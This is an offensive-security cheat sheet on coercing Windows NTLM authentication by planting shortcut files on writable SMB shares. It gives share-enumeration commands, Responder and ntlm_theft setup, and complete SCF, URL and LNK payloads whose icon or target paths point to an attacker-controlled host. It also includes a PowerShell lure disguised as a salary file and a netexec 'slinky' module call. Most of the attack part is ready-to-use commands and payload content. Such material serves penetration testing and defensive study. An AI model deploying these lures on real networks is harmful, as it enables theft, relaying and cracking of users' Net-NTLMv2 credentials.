LIVING OFF THE LAND COERCION

PRIMARY CATEGORY → MITM & COERCED AUTHS   •   WINDOWS PRIVESC

Shortcut Files

e.g. SCF, LNK, URL and so on

Workflow

We must bear in mind that Windows File Explorer always tries to render the icon of any existing resource within a given location ( i.e. a directory )

Every resource has its own icon, whose location is specified within it

<SNIP>
iconFile=<ICON_FILE_PATH>
<SNIP>

For instance, if we compromises a principal that has WRITE permissions over a certain SMB share, we could try to place a shortcut file within the latter whose iconFile points to a remote SMB server controlled by the attacker

So, when any user accesses the share location where the shortcut file has been placed using the Windows File Explorer, the latter will try to start an SMB session to the target in order to request this resource i.e. the shortcut’s iconFile

Then, it will be asked for authentication, so we will receive an incoming authentication that we can leverage to either relay it to another host or try to crack the Net-NTLMv2 response

Any shortcut file we create should start with the @ character to ensure that it appears on top of the share, and, hence, the file explorer parses it

Requirements

• The controlled local/domain user account must have WRITE permissions over a location within an SMB share

Abuse

Verifying if the user account has write permissions over the share

Netexec

netexec smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --shares

SMBMap

smbmap -H '<TARGET>' -u '<USER>' -p '<PASSWD>' -d '<DOMAIN>'

Setting up an SMB Server to intercept incoming authentications

• Responder

Setup

git clone https://github.com/lgandx/Responder Responder
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

Usage

python3 Responder.py --interface '<NETWORK_INTERFACE>' --verbose

Creating the malicious Shortcut File

• NTLM Theft

It generates multiple types of NTLMv2 hash theft files

Setup

git clone https://github.com/Greenwolf/ntlm_theft NTLMTheft
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install xlsxwriter

Usage

python3 ntlm_theft.py --generate all --server '<ATTACKER_IP>' --filename pwn

It creates a new directory named pwn which has the following content

Content

pwn
├── Autorun.inf
├── desktop.ini
├── pwn.application
├── pwn.asx
├── pwn-(externalcell).xlsx
├── pwn-(frameset).docx
├── pwn-(fulldocx).xml
├── pwn-(handler).htm
├── pwn.htm
├── pwn-(icon).url
├── pwn-(includepicture).docx
├── pwn.jnlp
├── pwn.library-ms
├── pwn.lnk
├── pwn.m3u
├── pwn.pdf
├── pwn-(remotetemplate).docx
├── pwn.rtf
├── pwn.scf
├── pwn-(stylesheet).xml
├── pwn.theme
├── pwn-(url).url
├── pwn.wax
└── zoom-attack-instructions.txt
 
1 directory, 24 files

• SCF

pwn.scf

[Shell]
Command=2
IconFile=\\<ATTACKER_IP>\share\legit.ico
[Taskbar]
Command=ToggleDesktop

• URL

pwn.url

[InternetShortcut]
URL=https://www.domain.tld
IconIndex=0
IconFile=\\<ATTACKER_IP>\something\something.ico

• LNK

Netexec

Netexec

Creation and Upload

netexec smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --module slinky --options 'name=<ATTACKER_SMB_SHARE>' 'server=<ATTACKER_IP>'

Cleanup

netexec smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --module slinky --options 'name=<ATTACKER_SMB_SHARE>' 'server=<ATTACKER_IP>' 'CLEANUP=True'

Powershell

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\pwn.lnk") # .LNK Creation
$lnk.TargetPath = "\\<ATTACKER_IP>\pwn.png" # .LNK Target
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Salaries-2023."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()